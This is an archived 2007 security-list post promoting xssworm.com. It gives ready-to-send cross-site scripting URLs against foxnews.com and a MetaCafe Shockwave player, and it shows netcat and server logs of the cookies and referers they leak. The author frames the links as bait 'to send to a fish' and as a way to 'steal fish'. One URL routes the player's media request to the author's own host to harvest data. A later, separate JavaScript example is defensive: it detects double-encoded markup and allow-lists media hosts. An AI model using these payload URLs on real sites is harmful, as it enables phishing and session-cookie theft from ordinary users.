
foxnews-xss.txt

13 Nov 2007 | Reported by xssworm.com | Type: packetstorm | Source: packetstormsecurity.com

Foxnews 0day XSS Shock Attack Demo & Zero Day Shockwave SWF Player Exploi

`Foxnews 0day XSS Shock Attack  
<http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!>  
Demo link to send to a fish:  
  
http://www.foxnews.com/video2/launchPage.html?http://localhost/  
  
With netcat listening on localhost:  
  
listening on [any] 80 ...  
connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964  
GET  
/E05510/a3/0/3/1380/1/0/116282DDC64/0/0/00000000/312340660.gif?D=DM%5FLOC%3D  
http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%  
2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P  
age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%  
2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1  
Host: pix01.revsci.net  
User-Agent: Mozilla/5.0 (Mandriver)  
Accept: image/png,*/*;q=0.5  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost  
*Cookie: NETID01=9mWO-Ar@1RoAAAm1AWEAAAC5;  
NETSEGS_J05532=960C7930BE970CE4&J05532  
&3F149836&472757D9&0&&4723FE85&C2C6A1738F3B885FCA46DE74CFF355ED*  
  
  
I think maybe this is to make many shock waves with XSS!  
Zero Day Shockwave SWF Player Exploit with XSS  
Attack<http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/>  
in the hacking metacafe we discover Shockwave XSS 0day attack to use by  
blackhat to steal fish:  
  
MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - :  
  
http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true  
&  
  
We see this output in the xssworm.com log:  
  
  
GET /crossdomain.xml HTTP/1.1  
Host: metacafe.122.2o7.net  
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0  
D2D[CE];  
s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[  
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE0000639DC|4726056DCE]  
s_vi  
_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.....  
  
snips   
  
We see many more serious vulnerabilities in the web 2.0 today. As you must be  
sure to visit http://xssworm.com/ security portal to discuss this shock  
problem && many thanks for your reply. I am interested.  
  
*vaj  
  
  
--   
Francesco Vaj [CISSP - GIAC]  
CSS Security Researcher  
mailto:[email protected]  
aim: XSS Cross Site  
------  
XSS Cross Site Scripting Attacks and  
Web 2.0 AJAX Security Information News -  
http://xssworm.com/  
------  
"Vaj, bella vaj."  
`
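
Both requests in the post carry attacker-chosen content in a URL parameter: markup that is percent-encoded twice (`%253Ch1%253E`), and an absolute URL handed to the page or player (`launchPage.html?http://localhost/`, `mediaURL=`). As an added example that is not part of the original post or of either site's code, the JavaScript below shows a server-side check for both cases; the host names, the allow-list contents and the function names are assumptions.

```javascript
// Added example (not from the advisory or either site). Hosts below are
// constructed placeholders; the allow-list contents are an assumption.
const ALLOWED_MEDIA_HOSTS = new Set(["media.example.test", "cdn.example.test"]);
const MAX_ROUNDS = 5;

// Percent-decode until the text stops changing, so %253C -> %3C -> "<".
function fullyDecode(value) {
  let text = value;
  let layers = 0;
  while (layers < MAX_ROUNDS) {
    let next;
    try {
      next = decodeURIComponent(text);
    } catch (err) {
      break; // stray "%": nothing further can be decoded
    }
    if (next === text) break;
    text = next;
    layers += 1;
  }
  return { text, layers };
}

// Flag a request URL whose query string, once fully decoded, carries
// HTML markup or was encoded more than once.
function inspectQuery(rawUrl) {
  const q = rawUrl.indexOf("?");
  const { text, layers } = fullyDecode(q === -1 ? "" : rawUrl.slice(q + 1));
  const markup = /<\s*\/?\s*[a-z!]/i.test(text);
  return { layers, markup, suspicious: markup || layers > 1 };
}

// Accept a media URL parameter only if it is absolute http(s) and its
// host is on the allow-list; everything else is rejected.
function isAllowedMediaUrl(value) {
  let url;
  try {
    url = new URL(fullyDecode(value).text);
  } catch (err) {
    return false; // relative, scheme-less ("//host") or unparsable
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  return ALLOWED_MEDIA_HOSTS.has(url.hostname);
}
```

Decoding to a fixed point before matching is what catches the double-encoded form; a filter that decodes once sees only `%3Ch1%3E` and passes it on.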
